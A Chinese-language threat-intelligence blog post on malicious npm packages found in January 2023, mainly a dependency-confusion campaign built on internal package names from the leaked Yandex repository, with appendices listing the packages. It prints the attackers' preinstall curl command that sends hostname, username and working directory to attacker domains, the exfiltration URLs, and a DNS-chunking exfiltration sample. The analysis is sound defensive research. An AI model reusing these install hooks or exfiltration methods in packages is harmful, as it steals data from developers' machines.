【天问】利用数据泄露信息进行npm生态供应链攻击！

在2023年刚开始的第一个月里，针对npm生态的软件供应链恶意攻击也在持续不断，通过奇安信技术研究院星图实验室研发的“天问”软件供应链安全分析平台对npm生态持续进行监测分析后，总共发现了537个npm恶意包。这其中包括一起利用数据泄露信息进行的大规模上传npm恶意包的新型攻击行为，以及其他持续不断的已知形式的供应链攻击行为。

利用Yandex泄漏的数据进行供应链攻击

2023年1月25日，俄罗斯科技巨头Yandex公司的源代码仓库数据被泄露，随后在1月27日，npm生态就出现了利用该泄露数据进行的供应链攻击。

Yandex是俄罗斯市场占有率最大的搜索引擎，该公司旗下产业涉及广泛，除了搜索引擎之外，还包含地图、打车、云服务、金融支付等等各个领域的软件应用（类似国内的百度）。

npm-data-leak-supply-chain-attack-img1

在此次泄露事件中，虽然没有相关的用户数据被泄露，但源代码仓库内的信息仍有可能被恶意攻击者利用。根据我们安全研究员的合理推测，攻击者应该是在分析了该代码仓库的内容后，找到了yandex公司内部使用的npm包名称，并对其进行了依赖混淆攻击。

例如，攻击者上传了名为@yandex-travel/ui@1.1.0的恶意包，从包名我们可以推断出该npm包应该存在于yandex公司内部使用的npm源中，在攻击者上传之前npm官方源(registry.npmjs.com)中并没有这个包。攻击者通过在官方源上传同名的npm软件包，以达到依赖混淆攻击的目的。

攻击者在短短两天时间内上传了428个利用了yandex内部npm库名称的恶意包，这些恶意包中都仅仅只包含一个package.json的文件，恶意代码直接嵌入在在该文件的preinstall字段中，如下图所示：

npm-data-leak-supply-chain-attack-img2

对文件内容增加换行和适当的缩进之后，详细的恶意script字段如下：

"scripts":{
    "test":"echo \"Error: no test specified\" && exit 1",
    "preinstall":"curl \
        -H "Package: @yandex-travel/ui" 
        -H "Version: 1.1.0\" 
        -H "Hostname: $(hostname | base64)" 
        -H "Whoami: $(whoami | base64)" 
        -H "Pwd: $(pwd | base64)"  
        -d "meow! security test" 
        http://npm_org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru"
}

这段命令执行后会向远程服务地址发起一个HTTP请求，并在header中包含窃取的被攻击者机器上的敏感信息。这些内容包括：

当前被安装包的名称
当前被安装包的具体版本
受害者机器的hostname，并被编码为base64
受害者机器的当前登陆用户名，并被编码为base64
受害者机器的当前工作目录，并被编码为base64

其他的npm包中也均为相同的代码，但其中远程请求的服务地址进行了一些改动，根据分析共发现5个用于接收数据的url地址。

"http://npm-frontend.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru/",
"http://npm-org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru/",
"http://npm-new.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru/",
"http://npm.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru/",
"http://npm-taxi.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru/"

除此之外，用于发布这些包的npm 账户也分为三个，详细情况如下：

"_npmUser" : {
    "name" : "meow-test",
    "email" : "act1on3-test@yandex.com"   （共发布258个）
}

"_npmUser" : {
    "name" : "act1on3-test",
    "email" : "act1on3-test@yandex.ru" （共发布81个）
}

"_npmUser" : {
    "name" : "security_act1on3_2",
    "email" : "artemlogutov@yandex.com" （共发布89个）
},

最后，在此次攻击事件中所有利用的npm包名称及其版本号可见后文附录。

2023年1月其他供应链攻击事件

在2023年刚开始的一个月中，除了上述利用数据泄露进行的供应链攻击行为之外，其他之前常见的恶意攻击行为也在持续不断的发生着。“天问”软件供应链安全分析平台共捕获其他的npm恶意包109个，例如，在恶意npm包fi-connect@99.9.9中，攻击者利用DNS分片回传窃取的敏感信息，以达到更加隐蔽的传输目的。这在以往的npm恶意包分析中也遇到过，是一种常见的攻击者用来隐蔽回传信息的方式，感兴趣的朋友可以前往博客查看我们的历史文章。

在上面的代码中，攻击者首先利用一个http请求，从api.ipifly.org获取当前环境下的公网ip地址。然后通过执行代码拿到当前受害者机器上的用户名称、工作目录、主机名称等信息，将这些信息通过DNS解析间接传输给攻击者所控制的域名解析服务器来接收。

该恶意包对外查询DNS的请求形式如下(部分敏感数据已被隐藏)：

vcbpk.4.22757365726e616d65223a22726f6f.smnfbb.com
vcbpk.5.74222c22686f73746e616d65223a22.smnfbb.com
vcbpk.0.7b227061636b6167656e616d65223a.smnfbb.com
vcbpk.1.2266692d636f6e6e656374222c2263.smnfbb.com
vcbpk.3.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.smnfbb.com
vcbpk.6.776f726b6572222c226970223a2222.smnfbb.com
vcbpk.2.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.smnfbb.com
vcbpk.7.7d00.smnfbb.com

将其中的数据部分拼接起来后得到：

7b227061636b6167656e616d65223a2266692d636f6e6e656374222c2263xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx22757365726e616d65223a22726f6f74222c22686f73746e616d65223a22776f726b6572222c226970223a22227d00

去掉末尾额外附加的两个0，再将该16进制编码转换为utf-8字符即可以获得原始发送的数据内容

{
  "packagename": "fi-connect",
  "cwd": xxxxxxxxxxxxxxxxx,
  "username": "root",
  "hostname": "worker",
  "ip": ""
}

参考链接

附录

yandex泄露事件被利用的npm包名称及版本号（共428个）

kroniko@1.1.2
kroniko@1.1.6
kroniko@1.33.7
yabox@4.1.0
yabox@4.1.7
yandex-cfg-env@2.1.1
yandex-cfg-env@2.3.17
divcard2@1.4.9
divcard2@2.2.1
divcard2@2.2.18
csp-preset-yastatic@0.1.0
csp-preset-yastatic@0.3.11
csp-preset-yastatic@1.3.37
express-http-geobase@3.11.1
express-http-geobase@4.0.0
express-http-langdetect@3.11.1
express-http-langdetect@4.0.0
@yandex-travel/eslint-config@0.0.7
@yandex-travel/eslint-config@0.3.13
@yandex-travel/eslint-config@1.0.1
@yandex-travel/ts-config@0.1.0
@yandex-travel/ci@1.1.0
@yandex-travel/ui@1.1.0
@yandex-travel/eslint-kit@1.1.0
@realty-front/codegen@1.0.0
@realty-front/codegen@1.13.1
@realty-front/eslint-plugin@1.0.0
@realty-front/eslint-plugin@1.13.1
@realty-front/stylelint-plugins@1.0.0
@realty-front/stylelint-plugins@1.13.1
@realty-front/dayjs@1.0.0
@realty-front/dayjs@1.13.1
@realty-front/payment-cards@1.0.0
@realty-front/payment-cards@1.13.1
@realty-front/dev-tools@1.0.0
@realty-front/dev-tools@1.13.1
@realty-front/icons@1.0.0
@realty-front/icons@1.13.1
@realty-front/jest-utils@1.0.0
@realty-front/jest-utils@1.13.1
@realty-front/webpack-utils@1.0.0
@realty-front/webpack-utils@1.13.1
@realty-front/ad@1.0.0
@realty-front/ad@1.13.1
@realty-front/ydb@1.0.0
@realty-front/ydb@1.13.1
@realty-front/zookeeper@1.0.0
@realty-front/zookeeper@1.13.1
@b2bgeo/run-if-changed@13.3.7
@b2bgeo/run-in-packages@13.3.7
@b2bgeo/configs@13.3.7
@b2bgeo/ci-s3@13.3.7
@b2bgeo/ci-startrek@13.3.7
@b2bgeo/tanker@13.3.7
@b2bgeo/utils@13.3.7
@b2bgeo/backend-api-types@13.3.7
@b2bgeo/frontend-server-api-types@13.3.7
@b2bgeo/yav@13.3.7
@b2bgeo/ci-aws@13.3.7
@b2bgeo/design-system@13.3.7
@b2bgeo/ci-github@13.3.7
@b2bgeo/map-icons@13.3.7
@b2bgeo/certs@13.3.7
vow-got@1.1.0
vow-got@1.18.1
vow-got@13.1.0
pino-deploy@0.0.1
pino-deploy@1.0.0
remove-docker-tag@1.0.0
remove-docker-tag@7.0.1
tslint-ymaps-rules@0.1.8
tslint-ymaps-rules@0.13.37
tslint-ymaps-rules@1.0.1
ymaps-tanker@1.4.0
ymaps-tanker@1.13.1
ymaps-tanker@2.0.1
ymaps-tanker@2.11.1
changelog-tool@0.3.0
changelog-tool@1.1.0
ymaps-api-response@2.0.0
ymaps-api-response@2.13.8
yandex-sanitizer@0.4.0
yandex-sanitizer@0.13.1
yandex-sanitizer@1.2.3
yandex-dch-up@3.2.0
yandex-dch-up@3.8.19
yandex-dch-up@4.10.1
mobile-auth-library-react-native@0.9.0
mobile-auth-library-react-native@1.3.8
yb-frontend-components@0.0.3
yb-frontend-components@0.0.18
yb-frontend-components@1.0.2
yb-frontend-utils@0.0.12
yb-frontend-utils@0.0.15
yb-frontend-utils@0.12.1
yb-frontend-utils@1.3.3
bunker-avatar@1.0.1
bunker-avatar@1.13.17
bunker-tjson@2.0.0
bunker-tjson@2.12.4
bem-mvc-direct@1.0.4
bem-mvc-direct@1.11.3
auto-issues@1.3.2
auto-issues@1.18.2
tanker-branch@0.4.0
tanker-branch@0.7.1
tanker-branch@1.3.2
tanker-pilot@1.4.0
tanker-pilot@1.8.1
tanker-pilot@3.1.3
react-wp-viewer@0.2.13
react-wp-viewer@1.2.12
yastatic-s3@0.1.8
yastatic-s3@1.0.8
meccano@2.0.1
meccano@3.1.3
tools-access-express@4.1.7
tools-access-express@4.8.7
tools-access-configs@0.0.8
tools-access-configs@0.1.7
tools-access-configs@1.0.1
tools-access-react@1.0.17
tools-access-react@1.3.17
tools-access-react-redux@1.1.11
tools-access-react-redux@1.3.33
tools-access-react-redux-router@2.0.15
tools-access-react-redux-router@2.10.1
tools-access-react-redux-router@3.1.1
eslint-config-promo@0.0.1
stylelint-config-promo@0.0.4
eslint-config-distribution@0.0.1
yasap-bump@1.0.9
yasap-bump@1.3.17
yasap-bump@3.1.37
yasap-cache@1.0.15
yasap-cache@1.1.8
yasap-cache@2.0.6
yasap-gulp-tools@1.4.15
yasap-gulp-tools@1.5.12
yasap-gulp-tools@1.13.1
yasap-gulp-tools@2.3.0
yasap-gulp-dev-tools@1.2.12
yasap-gulp-dev-tools@1.3.37
yasap-gulp-dev-tools@2.1.1
staff-lite@0.0.19
woofmd-to-bemjson@0.8.14
woofmd-to-bemjson@1.1.1
woofmd-to-bemjson@2.2.2
yappy_ts@0.0.1-suns-1418
portal-node-logger@1.0.9
portal-node-logger@1.2.1
portal-node-logger@1.12.21
portal-node-logger@2.7.1
express-yandex-send-limit@1.0.18
express-yandex-send-limit@1.7.1
express-yandex-send-limit@2.3.3
yandex-cssformat@1.1.11
yandex-cssformat@1.7.11
yandex-cssformat@2.7.0
yandex-sendsms@1.0.2
yandex-sendsms@1.0.14
yandex-sendsms@1.7.8
branch-to-cmsg@1.0.12
branch-to-cmsg@1.7.7
branch-to-cmsg@2.5.1
borschik-webp-internal@1.6.5
borschik-webp-internal@1.9.15
borschik-webp-internal@2.15.9
y-font-decoder@0.1.19
y-font-decoder@0.3.13
y-font-decoder@1.7.13
yandex-bro-embedded-site-api@1.0.21-hf1
eslint-plugin-yandex-morda-views@1.0.8
yandex-net@4.1.8
ufo-helpers@1.2.13
ufo-helpers@1.7.1
ufo-helpers@2.2.2
ufo-rocks2@3.84.1
ufo-rocks2@4.0.0
yt-test-reporter@1.1.0
yt-test-reporter@1.12.8
yt-test-reporter@2.9.3
express-tvm-nodejs4@2.0.2
express-tvm-nodejs4@2.7.1
express-tvm-nodejs4@3.3.7
hermione-login-plugin@0.1.7
hermione-login-plugin@0.12.8
hermione-login-plugin@1.4.5
sendbernar@0.9.2
sendbernar@0.9.28
sendbernar@1.1.0
domains-uglify@0.2.14
domains-uglify@0.16.1
domains-uglify@1.1.6
toloka-templates-deploy@1.0.25
toloka-templates-deploy@1.12.1
toloka-templates-deploy@2.2.1
issues-changelog-generator@1.10.18
issues-changelog-generator@2.11.8
route-converter@0.2.7
route-converter@0.2.18
route-converter@1.0.0
testpalm-api@0.8.9
testpalm-api@0.13.1
testpalm-api@1.4.16
y-dot@1.8.8
y-dot@1.8.16
y-dot@1.16.8
y-dot@2.7.3
vow-got@1.1.1
pino-deploy@0.0.2
remove-docker-tag@1.0.1
tslint-ymaps-rules@0.1.9
tslint-ymaps-rules@0.13.38
tslint-ymaps-rules@1.0.2
ymaps-tanker@1.4.1
ymaps-tanker@1.13.2
ymaps-tanker@2.0.2
ymaps-tanker@2.11.2
changelog-tool@0.3.1
ymaps-api-response@2.0.1
yandex-sanitizer@0.4.1
yandex-sanitizer@0.13.2
yandex-sanitizer@1.2.4
yandex-dch-up@3.2.1
yandex-dch-up@3.8.20
yandex-dch-up@4.10.2
mobile-auth-library-react-native@0.9.1
mobile-auth-library-react-native@1.3.9
yb-frontend-components@0.0.4
yb-frontend-components@0.0.19
yb-frontend-components@1.0.3
yb-frontend-utils@0.0.13
yb-frontend-utils@0.0.16
yb-frontend-utils@0.12.2
yb-frontend-utils@1.3.4
bunker-avatar@1.0.2
bunker-avatar@1.13.18
bunker-tjson@2.0.1
bem-mvc-direct@1.0.5
bem-mvc-direct@1.11.4
auto-issues@1.3.3
auto-issues@1.18.3
tanker-branch@0.4.1
tanker-branch@0.7.2
tanker-branch@1.3.3
tanker-pilot@1.4.1
tanker-pilot@1.8.2
tanker-pilot@3.1.4
react-wp-viewer@0.2.14
react-wp-viewer@1.2.13
yastatic-s3@0.1.9
meccano@2.0.2
tools-access-express@4.1.8
tools-access-configs@0.0.9
tools-access-react@1.0.18
tools-access-react-redux@1.1.12
tools-access-react-redux-router@2.0.16
tools-access-react-redux-router@2.10.2
tools-access-react-redux-router@3.1.2
eslint-config-promo@0.0.2
stylelint-config-promo@0.0.5
eslint-config-distribution@0.0.2
yasap-bump@1.0.10
yasap-cache@1.0.16
yasap-gulp-tools@1.4.16
yasap-gulp-tools@1.5.13
yasap-gulp-dev-tools@1.2.13
yasap-gulp-dev-tools@1.3.38
yasap-gulp-dev-tools@2.1.2
staff-lite@0.0.20
woofmd-to-bemjson@0.8.15
woofmd-to-bemjson@1.1.2
woofmd-to-bemjson@2.2.3
yappy_ts@0.0.2
portal-node-logger@1.0.10
portal-node-logger@1.2.2
express-yandex-send-limit@1.0.19
yandex-cssformat@1.1.12
yandex-cssformat@1.7.12
yandex-cssformat@2.7.1
yandex-sendsms@1.0.3
yandex-sendsms@1.0.15
yandex-sendsms@1.7.9
branch-to-cmsg@1.0.13
branch-to-cmsg@1.7.8
borschik-webp-internal@1.6.6
borschik-webp-internal@1.9.16
borschik-webp-internal@2.15.10
y-font-decoder@0.1.20
y-font-decoder@0.3.14
y-font-decoder@1.7.14
yandex-bro-embedded-site-api@1.0.22
eslint-plugin-yandex-morda-views@1.0.9
yandex-net@4.1.10
ufo-helpers@1.2.14
ufo-rocks2@3.84.2
yt-test-reporter@1.1.1
express-tvm-nodejs4@2.0.3
hermione-login-plugin@0.1.8
hermione-login-plugin@0.12.9
hermione-login-plugin@1.4.6
sendbernar@0.9.3
sendbernar@0.9.29
sendbernar@1.1.1
domains-uglify@0.2.15
domains-uglify@0.16.2
domains-uglify@1.1.7
toloka-templates-deploy@1.0.26
toloka-templates-deploy@1.12.2
toloka-templates-deploy@2.2.2
issues-changelog-generator@1.10.19
issues-changelog-generator@2.11.9
route-converter@0.2.8
route-converter@0.2.19
route-converter@1.0.1
testpalm-api@0.8.10
testpalm-api@0.13.2
y-dot@1.8.9
y-dot@1.8.17
y-dot@1.16.9
@yandex-travel/eslint-config@0.0.8
@yandex-travel/eslint-config@0.3.14
@yandex-travel/ts-config@0.1.1
@yandex-travel/ci@1.1.1
@yandex-travel/ui@1.1.1
@yandex-travel/eslint-kit@1.1.1
@realty-front/codegen@1.0.1
@realty-front/codegen@1.13.2
@realty-front/eslint-plugin@1.0.1
@realty-front/eslint-plugin@1.13.2
@realty-front/stylelint-plugins@1.0.1
@realty-front/dayjs@1.0.1
@realty-front/dayjs@1.13.2
@realty-front/payment-cards@1.0.1
@realty-front/payment-cards@1.13.2
@realty-front/dev-tools@1.0.1
@realty-front/dev-tools@1.13.2
@realty-front/icons@1.0.1
@realty-front/icons@1.13.2
@realty-front/jest-utils@1.0.1
@realty-front/jest-utils@1.13.2
@realty-front/webpack-utils@1.0.1
@realty-front/webpack-utils@1.13.2
@realty-front/ad@1.0.1
@realty-front/ad@1.13.2
@realty-front/ydb@1.0.1
@realty-front/ydb@1.13.2
@realty-front/zookeeper@1.0.1
@realty-front/zookeeper@1.13.2
@b2bgeo/run-if-changed@13.3.8
@b2bgeo/run-in-packages@13.3.8
@b2bgeo/configs@13.3.8
@b2bgeo/ci-s3@13.3.8
@b2bgeo/ci-startrek@13.3.8
@b2bgeo/tanker@13.3.8
@b2bgeo/utils@13.3.8
@b2bgeo/backend-api-types@13.3.8
@b2bgeo/frontend-server-api-types@13.3.8
@b2bgeo/yav@13.3.8
@b2bgeo/ci-aws@13.3.8
@b2bgeo/design-system@13.3.8
@b2bgeo/ci-github@13.3.8
@b2bgeo/certs@13.3.8
taxi-localization@5.0.18
taxi-localization@5.10.3
supchat-plugins@13.1.0
taxi-monitoring@0.0.13
postcss-file-match@0.0.7
postcss-file-match@0.8.3
postcss-file-match@1.3.7
yandex-logger-qloud@1.1.29
yandex-logger-qloud@1.3.37
yandex-logger-sentry@1.0.9
yandex-logger-sentry@1.3.37
yandex-logger-std@1.0.9
yandex-logger-std@1.3.37
simple-qloud-logger@0.1.21
simple-qloud-logger@1.0.3
tanker-ts-i18n@0.0.1
tanker-ts-i18n@0.0.7
tanker-ts-i18n@1.0.3
toolbox-bem-bundle@3.0.0
toolbox-bem-bundle@4.0.1
yandex-sendlinksms@2.0.5
yandex-sendlinksms@2.3.5
yandex-sendlinksms@3.3.0
delta-editor@1.1.2
delta-editor@1.7.2
middleware-idm-response@0.0.2
middleware-idm-response@0.3.3
tools-access-lego@0.0.1
node-gulp-tanker@1.0.14
node-gulp-tanker@1.8.1
staff-www@4.21.20
staff-www@4.30.38
staff-www@4.50.12
staff-www@5.0.0
images-inliner@1.0.0
mini-suggest@1.1.6
pdb-extensions@1.1.1
pdb-geobase@1.0.1
pdb-uatraits@1.2.0
yasap-lodash@1.7.1
afisha-ab@1.4.0
node-http-uatraits@2.0.0
web-suggest@1.3.8
web-suggest@2.0.21
skip-validator@1.1.0
searchband-frontend-assistant@4.1.2
bemhint.i18n@0.2.6
bemhint-plugins@0.5.12
karma-i-ua@0.1.6
karma-jasmine-i-global@0.1.6
karma-jasmine-i-global@0.7.32
karma-jasmine-i-request@0.1.6
karma-jasmine-i-request@0.6.21
karma-jquery2@0.1.9
karma-jquery2@0.5.34
karma-wait-for-load@0.1.8
karma-wait-for-load@0.5.34
lego-stuff@0.4.0
proxy-stub-utils@1.2.3
proxy-stub-utils@3.2.1
eslint-plugin-hermione-serp@1.0.0
fiji-svg-sprite@2.0.0
staff-api@1.0.3
staff-api@1.14.2

2023年1月发现的其他恶意包(109个)

customer-satisfaction-survey@12.0.0
market-apps-list@99.99.99
market-apps-list@100.99.99
market-apps-list@101.99.99
market-apps-list@101.100.99
portal-numbers@99.9.9
generic-ui-components@99.9.9
latitude-analytics@99.9.9
fi-connect@99.9.9
chrome-extension-message-relay@99.9.9
dropbox-internal-sdk@99.9.9
si-mfes-library@99.9.9
hsbc-pb-sdk@99.9.9
dropbox-internal-sdk@1.9.9
dropbox-internal-sdk@2.9.9
dropbox-internal-sdk@3.9.9
portal-numbers@1.9.9
portal-numbers@0.9.9
market-apps-list@102.102.100
agent-core@25.25.25
digitalsignaturecb@1.0.0
mvpeloassistantbackend@10.0.0
shared-gatsby-components@99.9.9
bsd-ui-utils@99.9.9
bsd-ui-utils@9.9.9
bsd-ui-utils@1.9.9
bsd-ui-utils@0.9.9
maw-fetch@0.9.9
maw-fetch@9.9.9
maw-fetch@99.9.9
maw-fetch@1.9.9
canopy-common-fo@99.9.9
evolve-runtime@99.9.9
rdi-ui@99.9.9
cu-dashboard-components@99.9.9
vasbro@1.0.0
samplejack@1.0.0
@jackbro/express-sessionm@1.0.0
macoshuntingyes@1.0.0
loveapple@1.0.0
loveslack@1.0.0
farbtastic@1.0.0
ic-types@1.83.0
ic-types@1.84.0
hpackeyboard-core@1.0.0
inter-frontend-svgs@3.2.8
inter-mobile-bridge@1.0.8
hw-web-bridge-app@0.1.0
bitbank-api-docs@1.0.0
she-c@2.2.7
she-c@2.2.8
northstar_domain@1.14.3
northstar_domain@1.14.4
northstar_domain@2.0.3
tada-components@99.99.100
@mydatamodels/tada-components@99.99.100
offsec-depender@1.0.1
@mydatamodels/tada-components@99.99.101
@mydatamodels/tada-components@99.99.102
offsec-dep-test@1.0.1
store-js-sdk@1.0.0
store-js-sdk@1.0.1
bjss-atp-web@9.0.0
bjss-atp-web@9.0.1
usaa-a11y-test@1.0.0
bjss-atp-web@9.0.2
usaa-breadcrumbs@1.0.0
web-dep-conf@1.0.0
dependdency@1.0.0
packagebyme@1.0.0
conf-dep-test@2.0.0
web-flipper@1.0.0
docusaurus-2-facebook-template@4.0.0-alpha.1
uitk-build-tasks@10.0.0
bjss-atp-web@9.0.3
@hyperion-util/script-loader@77.77.78
@hyperion-util/deferred-value@77.77.78
@hyperion-util/cookies@77.77.79
@hyperion-util/deferred-value@77.77.79
@hyperion-util/script-loader@77.77.79
gatorcomponents@99.9.9
gatorcomponents@0.9.9
gatorcomponents@1.9.9
gatorcomponents@2.9.9
gatorcomponents@3.9.9
gatorcomponents@4.9.9
gatorcomponents@5.9.9
gatorcomponents@6.9.9
gatorcomponents@7.9.9
malicious-package-name@100.0.0
testtestkakakalala@100.99.99
testtestkakakalala@101.99.99
ban-notifier1@1.0.0
ban-notifier2@1.0.0
ban-notifier@1.0.0
links-3@9.0.1
documentation-ably-realtime@1.0.2
gatorcomponents@99.9.10
donuts.node-build@99.99.100
donuts.node-build@99.99.101
donuts.node-build@99.99.102
donuts.node-build@99.99.103
donuts.node-build@99.99.104
nayduck@99.99.99
tokenlon-v5-subgraph@99.99.99
climate-warehouse@99.99.99
zsbpwebsdk@9999.9.9
zsbpsdk@99999.9.9
falsepositivecheck6969@9999.9.9